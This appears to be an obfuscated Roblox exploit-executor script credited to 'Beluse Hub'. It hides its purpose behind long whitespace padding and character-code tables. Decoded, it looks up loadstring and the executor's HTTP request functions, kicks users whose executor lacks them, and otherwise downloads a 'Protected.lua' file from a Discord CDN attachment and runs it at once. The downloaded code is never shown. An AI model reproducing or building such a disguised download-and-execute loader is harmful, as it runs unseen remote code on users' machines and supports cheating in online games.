--[[
    Script by Beluse Hub, discord.gg/wWvyZM2xbj
     ____       _                  _    _       _     
    |  _ \     | |                | |  | |     | |    
    | |_) | ___| |_   _ ___  ___  | |__| |_   _| |__  
    |  _ < / _ \ | | | / __|/ _ \ |  __  | | | | '_ \ 
    | |_) |  __/ | |_| \__ \  __/ | |  | | |_| | |_) |
    |____/ \___|_|\__,_|___/\___| |_|  |_|\__,_|_.__/ 
]]

local a,b,c="my ass hurts",nil,nil;
function c(a,b,c)
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
end















do
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    





































local wSHSsEjgYtikixxbfotPM= {_nQdlieSXFcG = 111  , _NZOrwjSLwig = 100  , _sgcfMdZhxHE = 115  , _iomObKSFizq = 114  , _hKyITqNeHMN = 110  , _pZFdZORKNKQ = 103  , _baGiQGQEMxP = 103 , _QPkOjYsfcXS = 97 , _zQrMMZmniXU = 109 , _HLwbddnqkLd = 101 , _MofQzZQCwae = 104 , _hgdCrwVCFYw = 116 , _vEjzmSVYuqG = 112 , _cmmscrddHwF = 95 , _ppmMldoOdKQ = 114 , _JPzsyetwQCx = 113 , _kGtKAxCwyNe = 117 , _UEInXtcUXyN = 115 , _rzPPBXYYRTu = 121 , _PijaeJjpink = 110 , _gtEhvlshOPl = 105 , _gxVSSnLYKEN = 32 , _ReGEHwrboeE = 120 , _aOwsNwjIxRp = 99 , _MlnezjSXisB = 111 , _reCodszmayj = 58 , _eiYOdyMiAPm = 47 , _iBqqYlnYXTY = 100 , _bFkaxKdzAjx = 46 , _cPwyxlBAKYC = 57 , _zwnlHHYeldZ = 50 , _EPwfkqnoFcE = 56 , _hIahNNexpgP = 51 , _qTrlhVyMLGP = 55 , _sSYQHcElddi = 53 , _wBrvfjbmbrV = 49 , _CitgbJyllTM = 54 , _zgfJFKaSxBM = 48 , _jxTduiVbyZJ = 52 , _KnUAJpnCcZw = 80 , _ZTbBRXGmpmp = 108 , _vBUSVVsRZjJ = 71 , _IuoUPxpcprU = 69 , _BnbVLvAQkvZ = 84 }local EGenrtszHwMGtnCCuzITs=string;local lSjBuoJEUzCnUYgTTsAmq=getfenv()[EGenrtszHwMGtnCCuzITs.char( ( function ( sdPdVyLoyvySQChAtgwSQ , tOpBSINRGrFgbiaPVRzxs )
            local LOweRTSzHAeaZdRGoXQrT = {104 , 540 , 200 , 433 , 982 }
            return #LOweRTSzHAeaZdRGoXQrT end ) ( )+103, wSHSsEjgYtikixxbfotPM._nQdlieSXFcG, ( function ( YsEctXoiUQvdNJpSPTErk , HPJVplkuoajQxTsMGTwAG )
            local GsgwdsCSdKUPyygAiGGpi = {262 , 457 , 58 , 217 , 428 }
            return #GsgwdsCSdKUPyygAiGGpi end ) ( )+92, wSHSsEjgYtikixxbfotPM._NZOrwjSLwig, wSHSsEjgYtikixxbfotPM._sgcfMdZhxHE, ( function ( )
            local hFPSBTRjaPUBacUKYesJT = "0E3940BE10332436B47CF3E8DC1595E85FE76CC5CB497C2FA5DB28FF7953079340A90508EFE2A280785E120C212574135F23"
            return #hFPSBTRjaPUBacUKYesJT + 16 end ) ( ), wSHSsEjgYtikixxbfotPM._iomObKSFizq, ( function ( FUxuzmZXqYdhLstPdmjGg , visJojVIURTgzRZvFzGFw )
            local XNpjBsPNlFdxIBOhiPdYU = {48 , 382 , 857 , 641 , 455 }
            return #XNpjBsPNlFdxIBOhiPdYU end ) ( )+100, wSHSsEjgYtikixxbfotPM._hKyITqNeHMN, wSHSsEjgYtikixxbfotPM._pZFdZORKNKQ)..EGenrtszHwMGtnCCuzITs.char() .. '']local xaZPGuAVNCciSkzcIJgsn=getfenv()[EGenrtszHwMGtnCCuzITs.char( wSHSsEjgYtikixxbfotPM._baGiQGQEMxP, wSHSsEjgYtikixxbfotPM._QPkOjYsfcXS, wSHSsEjgYtikixxbfotPM._zQrMMZmniXU, wSHSsEjgYtikixxbfotPM._HLwbddnqkLd) .. '']local rBawciOAuVSRGBqHASTUc=getfenv()[EGenrtszHwMGtnCCuzITs.char( wSHSsEjgYtikixxbfotPM._MofQzZQCwae, wSHSsEjgYtikixxbfotPM._hgdCrwVCFYw, wSHSsEjgYtikixxbfotPM._hgdCrwVCFYw, wSHSsEjgYtikixxbfotPM._vEjzmSVYuqG, wSHSsEjgYtikixxbfotPM._cmmscrddHwF, wSHSsEjgYtikixxbfotPM._ppmMldoOdKQ, wSHSsEjgYtikixxbfotPM._HLwbddnqkLd, wSHSsEjgYtikixxbfotPM._JPzsyetwQCx, wSHSsEjgYtikixxbfotPM._kGtKAxCwyNe, wSHSsEjgYtikixxbfotPM._HLwbddnqkLd, wSHSsEjgYtikixxbfotPM._UEInXtcUXyN, wSHSsEjgYtikixxbfotPM._hgdCrwVCFYw) .. '']local PtTFsmtMmSPrANPvKECvm=getfenv()[EGenrtszHwMGtnCCuzITs.char( wSHSsEjgYtikixxbfotPM._UEInXtcUXyN, wSHSsEjgYtikixxbfotPM._rzPPBXYYRTu, wSHSsEjgYtikixxbfotPM._PijaeJjpink) .. '']local jtzOoiYyYcdCCJCMQZYoH=getfenv()[EGenrtszHwMGtnCCuzITs.char( wSHSsEjgYtikixxbfotPM._ppmMldoOdKQ, wSHSsEjgYtikixxbfotPM._HLwbddnqkLd, wSHSsEjgYtikixxbfotPM._JPzsyetwQCx, wSHSsEjgYtikixxbfotPM._kGtKAxCwyNe, wSHSsEjgYtikixxbfotPM._HLwbddnqkLd, wSHSsEjgYtikixxbfotPM._UEInXtcUXyN, wSHSsEjgYtikixxbfotPM._hgdCrwVCFYw) .. '']local jowNGsfsewGNzaaGPvgdg=getfenv()[EGenrtszHwMGtnCCuzITs.char( wSHSsEjgYtikixxbfotPM._MofQzZQCwae, wSHSsEjgYtikixxbfotPM._hgdCrwVCFYw, wSHSsEjgYtikixxbfotPM._hgdCrwVCFYw, wSHSsEjgYtikixxbfotPM._vEjzmSVYuqG) .. '']local vilXJZjhXwwdPmvHUzfUJ=rBawciOAuVSRGBqHASTUc or jtzOoiYyYcdCCJCMQZYoH or(PtTFsmtMmSPrANPvKECvm and PtTFsmtMmSPrANPvKECvm.request)or(jowNGsfsewGNzaaGPvgdg and jowNGsfsewGNzaaGPvgdg.request)if not vilXJZjhXwwdPmvHUzfUJ then return xaZPGuAVNCciSkzcIJgsn.Players.LocalPlayer:Kick(EGenrtszHwMGtnCCuzITs.char( wSHSsEjgYtikixxbfotPM._UEInXtcUXyN, wSHSsEjgYtikixxbfotPM._MofQzZQCwae, wSHSsEjgYtikixxbfotPM._gtEhvlshOPl, wSHSsEjgYtikixxbfotPM._hgdCrwVCFYw, wSHSsEjgYtikixxbfotPM._hgdCrwVCFYw, wSHSsEjgYtikixxbfotPM._rzPPBXYYRTu, wSHSsEjgYtikixxbfotPM._gxVSSnLYKEN, wSHSsEjgYtikixxbfotPM._QPkOjYsfcXS, wSHSsEjgYtikixxbfotPM._UEInXtcUXyN, wSHSsEjgYtikixxbfotPM._UEInXtcUXyN, wSHSsEjgYtikixxbfotPM._gxVSSnLYKEN, wSHSsEjgYtikixxbfotPM._HLwbddnqkLd, wSHSsEjgYtikixxbfotPM._ReGEHwrboeE, wSHSsEjgYtikixxbfotPM._HLwbddnqkLd, wSHSsEjgYtikixxbfotPM._aOwsNwjIxRp, wSHSsEjgYtikixxbfotPM._kGtKAxCwyNe, wSHSsEjgYtikixxbfotPM._hgdCrwVCFYw, wSHSsEjgYtikixxbfotPM._MlnezjSXisB, wSHSsEjgYtikixxbfotPM._ppmMldoOdKQ) .. "")end;lSjBuoJEUzCnUYgTTsAmq(vilXJZjhXwwdPmvHUzfUJ({Url=EGenrtszHwMGtnCCuzITs.char( wSHSsEjgYtikixxbfotPM._MofQzZQCwae, wSHSsEjgYtikixxbfotPM._hgdCrwVCFYw, wSHSsEjgYtikixxbfotPM._hgdCrwVCFYw, wSHSsEjgYtikixxbfotPM._vEjzmSVYuqG, wSHSsEjgYtikixxbfotPM._UEInXtcUXyN, wSHSsEjgYtikixxbfotPM._reCodszmayj, wSHSsEjgYtikixxbfotPM._eiYOdyMiAPm, wSHSsEjgYtikixxbfotPM._eiYOdyMiAPm, wSHSsEjgYtikixxbfotPM._aOwsNwjIxRp, wSHSsEjgYtikixxbfotPM._iBqqYlnYXTY, wSHSsEjgYtikixxbfotPM._PijaeJjpink, wSHSsEjgYtikixxbfotPM._bFkaxKdzAjx, wSHSsEjgYtikixxbfotPM._iBqqYlnYXTY, wSHSsEjgYtikixxbfotPM._gtEhvlshOPl, wSHSsEjgYtikixxbfotPM._UEInXtcUXyN, wSHSsEjgYtikixxbfotPM._aOwsNwjIxRp, wSHSsEjgYtikixxbfotPM._MlnezjSXisB, wSHSsEjgYtikixxbfotPM._ppmMldoOdKQ, wSHSsEjgYtikixxbfotPM._iBqqYlnYXTY, wSHSsEjgYtikixxbfotPM._QPkOjYsfcXS, wSHSsEjgYtikixxbfotPM._vEjzmSVYuqG, wSHSsEjgYtikixxbfotPM._vEjzmSVYuqG, wSHSsEjgYtikixxbfotPM._bFkaxKdzAjx, wSHSsEjgYtikixxbfotPM._aOwsNwjIxRp, wSHSsEjgYtikixxbfotPM._MlnezjSXisB, wSHSsEjgYtikixxbfotPM._zQrMMZmniXU, wSHSsEjgYtikixxbfotPM._eiYOdyMiAPm, wSHSsEjgYtikixxbfotPM._QPkOjYsfcXS, wSHSsEjgYtikixxbfotPM._hgdCrwVCFYw, wSHSsEjgYtikixxbfotPM._hgdCrwVCFYw, wSHSsEjgYtikixxbfotPM._QPkOjYsfcXS, wSHSsEjgYtikixxbfotPM._aOwsNwjIxRp, wSHSsEjgYtikixxbfotPM._MofQzZQCwae, wSHSsEjgYtikixxbfotPM._zQrMMZmniXU, wSHSsEjgYtikixxbfotPM._HLwbddnqkLd, wSHSsEjgYtikixxbfotPM._PijaeJjpink, wSHSsEjgYtikixxbfotPM._hgdCrwVCFYw, wSHSsEjgYtikixxbfotPM._UEInXtcUXyN, wSHSsEjgYtikixxbfotPM._eiYOdyMiAPm, wSHSsEjgYtikixxbfotPM._cPwyxlBAKYC, wSHSsEjgYtikixxbfotPM._zwnlHHYeldZ, wSHSsEjgYtikixxbfotPM._zwnlHHYeldZ, wSHSsEjgYtikixxbfotPM._EPwfkqnoFcE, wSHSsEjgYtikixxbfotPM._zwnlHHYeldZ, wSHSsEjgYtikixxbfotPM._hIahNNexpgP, wSHSsEjgYtikixxbfotPM._qTrlhVyMLGP, wSHSsEjgYtikixxbfotPM._sSYQHcElddi, wSHSsEjgYtikixxbfotPM._wBrvfjbmbrV, wSHSsEjgYtikixxbfotPM._wBrvfjbmbrV, wSHSsEjgYtikixxbfotPM._zwnlHHYeldZ, wSHSsEjgYtikixxbfotPM._qTrlhVyMLGP, wSHSsEjgYtikixxbfotPM._CitgbJyllTM, wSHSsEjgYtikixxbfotPM._EPwfkqnoFcE, wSHSsEjgYtikixxbfotPM._hIahNNexpgP, wSHSsEjgYtikixxbfotPM._zgfJFKaSxBM, wSHSsEjgYtikixxbfotPM._EPwfkqnoFcE, wSHSsEjgYtikixxbfotPM._zwnlHHYeldZ, wSHSsEjgYtikixxbfotPM._eiYOdyMiAPm, wSHSsEjgYtikixxbfotPM._wBrvfjbmbrV, wSHSsEjgYtikixxbfotPM._zgfJFKaSxBM, wSHSsEjgYtikixxbfotPM._zgfJFKaSxBM, wSHSsEjgYtikixxbfotPM._zwnlHHYeldZ, wSHSsEjgYtikixxbfotPM._cPwyxlBAKYC, wSHSsEjgYtikixxbfotPM._zgfJFKaSxBM, wSHSsEjgYtikixxbfotPM._qTrlhVyMLGP, wSHSsEjgYtikixxbfotPM._sSYQHcElddi, wSHSsEjgYtikixxbfotPM._hIahNNexpgP, wSHSsEjgYtikixxbfotPM._sSYQHcElddi, wSHSsEjgYtikixxbfotPM._sSYQHcElddi, wSHSsEjgYtikixxbfotPM._EPwfkqnoFcE, wSHSsEjgYtikixxbfotPM._qTrlhVyMLGP, wSHSsEjgYtikixxbfotPM._CitgbJyllTM, wSHSsEjgYtikixxbfotPM._cPwyxlBAKYC, wSHSsEjgYtikixxbfotPM._zwnlHHYeldZ, wSHSsEjgYtikixxbfotPM._CitgbJyllTM, wSHSsEjgYtikixxbfotPM._hIahNNexpgP, wSHSsEjgYtikixxbfotPM._jxTduiVbyZJ, wSHSsEjgYtikixxbfotPM._eiYOdyMiAPm, wSHSsEjgYtikixxbfotPM._KnUAJpnCcZw, wSHSsEjgYtikixxbfotPM._ppmMldoOdKQ, wSHSsEjgYtikixxbfotPM._MlnezjSXisB, wSHSsEjgYtikixxbfotPM._hgdCrwVCFYw, wSHSsEjgYtikixxbfotPM._HLwbddnqkLd, wSHSsEjgYtikixxbfotPM._aOwsNwjIxRp, wSHSsEjgYtikixxbfotPM._hgdCrwVCFYw, wSHSsEjgYtikixxbfotPM._HLwbddnqkLd, wSHSsEjgYtikixxbfotPM._iBqqYlnYXTY, wSHSsEjgYtikixxbfotPM._bFkaxKdzAjx, wSHSsEjgYtikixxbfotPM._ZTbBRXGmpmp, wSHSsEjgYtikixxbfotPM._kGtKAxCwyNe, wSHSsEjgYtikixxbfotPM._QPkOjYsfcXS) .. "",Method=EGenrtszHwMGtnCCuzITs.char( wSHSsEjgYtikixxbfotPM._vBUSVVsRZjJ, wSHSsEjgYtikixxbfotPM._IuoUPxpcprU, wSHSsEjgYtikixxbfotPM._BnbVLvAQkvZ) .. ""}).Body)()end;
